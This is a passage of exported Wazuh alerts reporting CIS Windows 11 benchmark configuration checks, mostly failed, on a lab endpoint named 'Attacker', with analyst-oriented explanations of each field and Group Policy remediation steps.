data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable Windows NTP Server' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable Windows NTP Server' is set to 'Disabled'.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:50:09.484+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.484+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable Windows NTP Server' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '10.4']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'AU.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.8.53.1.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.4']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2483175
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26276
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Enable Windows NTP Server' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to specify whether the Windows NTP Server is enabled. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The configuration of proper time synchronization is critically important in an enterprise managed environment both due to the sensitivity of Kerberos authentication timestamps and also to ensure accurate security logging.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\System\Windows Time Service\Time Providers\Enable Windows NTP Server. Note: This Group Policy path is provided by the Group Policy template W32Time.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.8.53.1.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  10.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  AU.8
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\W32Time\\TimeProviders\\NtpServer']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.563+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.563+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.6.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['2.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2486361
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26281
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether Microsoft Store apps with Windows Runtime API access directly from web content can be launched. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Blocking apps from the web with direct access to the Windows API can prevent malicious apps from being run on a system. Only system administrators should be installing approved applications.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\App runtime\Block launching Universal Windows apps with Windows Runtime API access from hosted content. Note: A reboot may be required after the setting is applied. Note #2: This Group Policy path may not exist by default. It is provided by the Group Policy template AppXRuntime.admx/adml that is included with the Microsoft Windows 10 RTM (Release 1507) Administrative Templates (or newer). Note #3: In older Microsoft Windows Administrative Templates, this setting was initially named Block launching Windows Store apps with Windows Runtime API access from hosted content., but it was renamed starting with the Windows 10 Release 1803 Administrative Templates
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.6.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  2.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disallow Autoplay for non-volume devices' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disallow Autoplay for non-volume devices' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.588+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.588+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disallow Autoplay for non-volume devices' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.4']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC5.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.8.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2490499
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26282
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Disallow Autoplay for non-volume devices' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting disallows AutoPlay for MTP devices like cameras or phones. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  An attacker could use this feature to launch a program to damage a client computer or data on the computer.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\AutoPlay Policies\Disallow Autoplay for non-volume devices. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template AutoPlay.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.8.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  10.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  CM.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.589+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.589+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.4']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC5.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.8.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2493544
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26283
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting sets the default behavior for Autorun commands. Autorun commands are generally stored in autorun.inf files. They often launch the installation program or other routines. The recommended state for this setting is: Enabled: Do not execute any autorun commands.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Prior to Windows Vista, when media containing an autorun command is inserted, the system will automatically execute the program without user intervention. This creates a major security concern as code may be executed without user's knowledge. The default behavior starting with Windows Vista is to prompt the user whether autorun command is to be run. The autorun command is represented as a handler in the Autoplay dialog.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Do not execute any autorun commands: Computer Configuration\Policies\Administrative Templates\Windows Components\AutoPlay Policies\Set the default behavior for AutoRun. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template AutoPlay.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.8.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  10.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  CM.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure enhanced anti-spoofing' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure enhanced anti-spoofing' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.611+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.611+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure enhanced anti-spoofing' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '8.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.10.1.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2497736
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26285
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Configure enhanced anti-spoofing' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines whether enhanced anti-spoofing is configured for devices which support it. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Enterprise managed environments are now supporting a wider range of mobile devices, increasing the security on these devices will help protect against unauthorized access on your network.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Biometrics\Facial Features\Configure enhanced anti-spoofing. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Biometrics.admx/adml that is included with the Microsoft Windows 10 Release 1511 Administrative Templates (or newer). Note #2: In the Windows 10 Release 1511 and Windows 10 Release 1607 & Server 2016 Administrative Templates, this setting was initially named Use enhanced anti-spoofing when available. It was renamed to Configure enhanced anti-spoofing starting with the Windows 10 Release 1703 Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.10.1.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  10.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  8.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Biometrics\\FacialFeatures']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Use of Camera' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Use of Camera' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.612+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.612+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Use of Camera' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.5']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.12.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2501545
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26286
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Allow Use of Camera' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether the use of Camera devices on the machine are permitted. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Cameras in a high security environment can pose serious privacy and data exfiltration risks - they should be disabled to help mitigate that risk.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Camera\Allow Use of Camera. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Camera.admx/adml that is included with the Microsoft Windows 10 Release 1607 & Server 2016 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.12.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Camera']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud optimized content' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud optimized content' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.617+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.617+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud optimized content' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.14.2']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2504389
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

